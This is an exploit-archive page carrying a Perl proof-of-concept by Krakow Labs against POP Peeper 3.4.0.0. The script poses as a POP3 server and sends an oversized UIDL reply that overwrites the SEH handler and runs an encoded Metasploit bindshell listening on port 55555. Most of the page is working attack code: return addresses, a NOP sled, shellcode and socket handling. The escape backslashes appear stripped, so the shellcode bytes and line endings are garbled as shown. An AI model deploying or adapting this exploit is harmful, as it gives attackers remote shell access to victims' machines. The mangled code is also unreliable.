[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)
# Published : 2009-02-27
# Author : Jeremy Brown
# Previous Title : EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
# Next Title : Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit 


#!/usr/bin/perl
# KL0209EXP-poppeeper_uidl-bof.pl
# 02.27.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal
# exploitation (gotta love no /SafeSEH). Special thanks goes to James Burton for help
# and collaboration for exploitation of this bug :P. Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [rush@krakowlabs.com]
# Jayji   (James Burton) [jayjiftw@gmail.com]
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.pl.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.jpg
#
# KL0209EXP-poppeeper_uidl-bof.pl

use IO::Socket;

$nextsehh = 0x909006EB; # JMP 6
$sehh     = 0x10014E39; # Windows XP UNIVERSAL Imap.dll pop pop ret

# Win32 Bindshell Shellcode (author=metasploit,port=55555,encoder=pexalphanum,size=709,exitfunc=thread)
$sc = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" .
      "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" .
      "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" .
      "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" .
      "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e" .
      "x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38" .
      "x4ex46x46x32x46x42x4bx48x45x34x4ex53x4bx58x4ex47" .
      "x45x30x4ax37x41x30x4fx4ex4bx38x4fx44x4ax31x4bx38" .
      "x4fx35x42x42x41x50x4bx4ex49x54x4bx48x46x33x4bx38" .
      "x41x50x50x4ex41x43x42x4cx49x39x4ex4ax46x58x42x4c" .
      "x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e" .
      "x46x4fx4bx53x46x35x46x32x4ax42x45x57x45x4ex4bx48" .
      "x4fx35x46x42x41x50x4bx4ex48x36x4bx48x4ex30x4bx54" .
      "x4bx58x4fx35x4ex51x41x50x4bx4ex43x50x4ex52x4bx58" .
      "x49x38x4ex56x46x52x4ex51x41x36x43x4cx41x43x4bx4d" .
      "x46x36x4bx58x43x54x42x53x4bx48x42x44x4ex30x4bx58" .
      "x42x57x4ex31x4dx4ax4bx38x42x54x4ax50x50x55x4ax46" .
      "x50x58x50x44x50x50x4ex4ex42x55x4fx4fx48x4dx48x56" .
      "x43x35x48x36x4ax46x43x43x44x53x4ax46x47x47x43x37" .
      "x44x43x4fx55x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e" .
      "x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx35x49x58x45x4e" .
      "x48x36x41x58x4dx4ex4ax50x44x30x45x45x4cx46x44x30" .
      "x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55" .
      "x4fx4fx48x4dx43x55x43x45x43x55x43x35x43x35x43x34" .
      "x43x55x43x44x43x45x4fx4fx42x4dx48x46x4ax46x49x4d" .
      "x43x30x48x36x43x55x49x38x41x4ex45x49x4ax46x46x4a" .
      "x4cx31x42x47x47x4cx47x55x4fx4fx48x4dx4cx36x42x41" .
      "x41x35x45x45x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42" .
      "x49x4ex47x45x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d" .
      "x4ax36x45x4ex49x54x48x48x49x54x47x35x4fx4fx48x4d" .
      "x42x55x46x45x46x55x45x45x4fx4fx42x4dx43x59x4ax46" .
      "x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x55" .
      "x4fx4fx42x4dx48x36x4cx46x46x46x48x56x4ax46x43x36" .
      "x4dx36x49x48x45x4ex4cx36x42x55x49x45x49x32x4ex4c" .
      "x49x48x47x4ex4cx36x46x54x49x38x44x4ex41x43x42x4c" .
      "x43x4fx4cx4ax50x4fx44x34x4dx32x50x4fx44x54x4ex32" .
      "x43x39x4dx48x4cx37x4ax43x4bx4ax4bx4ax4bx4ax4ax36" .
      "x44x47x50x4fx43x4bx48x51x4fx4fx45x57x46x34x4fx4f" .
      "x48x4dx4bx45x47x45x44x55x41x35x41x55x41x35x4cx36" .
      "x41x50x41x55x41x35x45x45x41x45x4fx4fx42x4dx4ax56" .
      "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx36" .
      "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x35x4ex4f" .
      "x43x58x46x4cx46x36x4fx4fx48x4dx44x45x4fx4fx42x4d" .
      "x4ax36x4fx4ex50x4cx42x4ex42x56x43x55x4fx4fx48x4d" .
      "x4fx4fx42x4dx5a";

$serv = IO::Socket::INET->new(Proto=>'tcp',
			      LocalPort=>'110',
			      Listen=>1,
			      Timeout=>60)
or die "Error: listen(110)n";

$cli = $serv->accept() or die "Error: accept()n";

$nextseh = pack('l', $nextsehh);
$seh     = pack('l', $sehh);
$nop     = "x90";

$payload = "+OKrn1 " . "A" x 1072 . $nextseh . $seh . $nop x 32 . $sc . "rn.rn";

     $cli->send("+OKrn");
     $cli->recv($recvbuf, 512);
     $cli->send("+OKrn");
     $cli->recv($recvbuf, 512);
     $cli->send("+OKrn");
     $cli->recv($recvbuf, 512);
     $cli->send("+OK 1 100rn");
     $cli->recv($recvbuf, 512);
     $cli->send($payload);

     close($cli);
     close($serv);

# www.Syue.com [2009-02-27]